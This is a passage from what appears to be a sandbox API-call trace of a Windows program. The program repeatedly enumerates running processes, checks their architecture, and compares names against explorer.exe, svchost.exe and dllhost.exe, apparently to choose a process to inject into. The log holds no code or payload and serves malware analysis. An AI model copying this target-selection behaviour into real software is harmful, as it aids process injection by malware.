th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0169.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0169.664] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.664] CloseHandle (hObject=0xd8) returned 1 [0169.664] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0169.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0169.665] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.665] CloseHandle (hObject=0xd8) returned 1 [0169.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0169.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0169.665] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.665] CloseHandle (hObject=0xd8) returned 1 [0169.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0169.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0169.666] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.666] CloseHandle (hObject=0xd8) returned 1 [0169.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0169.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0169.666] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.666] CloseHandle (hObject=0xd8) returned 1 [0169.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0169.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0169.667] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.667] CloseHandle (hObject=0xd8) returned 1 [0169.667] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0169.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0169.668] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.668] CloseHandle (hObject=0xd8) returned 1 [0169.668] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0169.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0169.668] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.668] CloseHandle (hObject=0xd8) returned 1 [0169.668] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0169.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0169.669] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.669] CloseHandle (hObject=0xd8) returned 1 [0169.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0169.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0169.669] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.669] CloseHandle (hObject=0xd8) returned 1 [0169.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0169.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0169.670] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.670] CloseHandle (hObject=0xd8) returned 1 [0169.670] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0169.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0169.671] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.671] CloseHandle (hObject=0xd8) returned 1 [0169.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0169.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0169.671] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.671] CloseHandle (hObject=0xd8) returned 1 [0169.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0169.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0169.672] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.672] CloseHandle (hObject=0xd8) returned 1 [0169.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0169.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0169.672] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.672] CloseHandle (hObject=0xd8) returned 1 [0169.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0169.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0169.673] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.673] CloseHandle (hObject=0xd8) returned 1 [0169.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0169.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0169.674] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.674] CloseHandle (hObject=0xd8) returned 1 [0169.674] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0169.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0169.674] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0169.675] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0169.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0169.675] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0169.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0169.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0169.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0169.677] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0169.677] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.677] CloseHandle (hObject=0xd8) returned 1 [0169.678] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0169.678] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0169.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0169.678] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.678] CloseHandle (hObject=0xd8) returned 1 [0169.678] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0169.678] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0169.678] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0169.678] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0169.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0169.679] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0169.679] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.679] CloseHandle (hObject=0xd8) returned 1 [0169.679] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0169.680] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.680] CloseHandle (hObject=0xd8) returned 1 [0169.680] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0169.680] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0169.681] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0169.681] CloseHandle (hObject=0xd8) returned 1 [0169.681] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.681] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0169.682] CloseHandle (hObject=0xd4) returned 1 [0169.682] Sleep (dwMilliseconds=0x3e8) [0170.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0170.690] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0170.691] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0170.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0170.691] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0170.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0170.692] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0170.692] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0170.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0170.693] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0170.693] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0170.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0170.694] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0170.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0170.695] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0170.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0170.695] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0170.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0170.696] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0170.696] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0170.697] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0170.697] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0170.698] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0170.698] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0170.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0170.699] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0170.699] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0170.700] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0170.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0170.700] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.700] CloseHandle (hObject=0xd8) returned 1 [0170.700] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0170.700] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0170.701] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0170.701] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0170.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0170.701] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0170.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0170.702] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0170.702] CloseHandle (hObject=0xd8) returned 1 [0170.702] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0170.702] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0170.702] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0170.702] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0170.702] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, 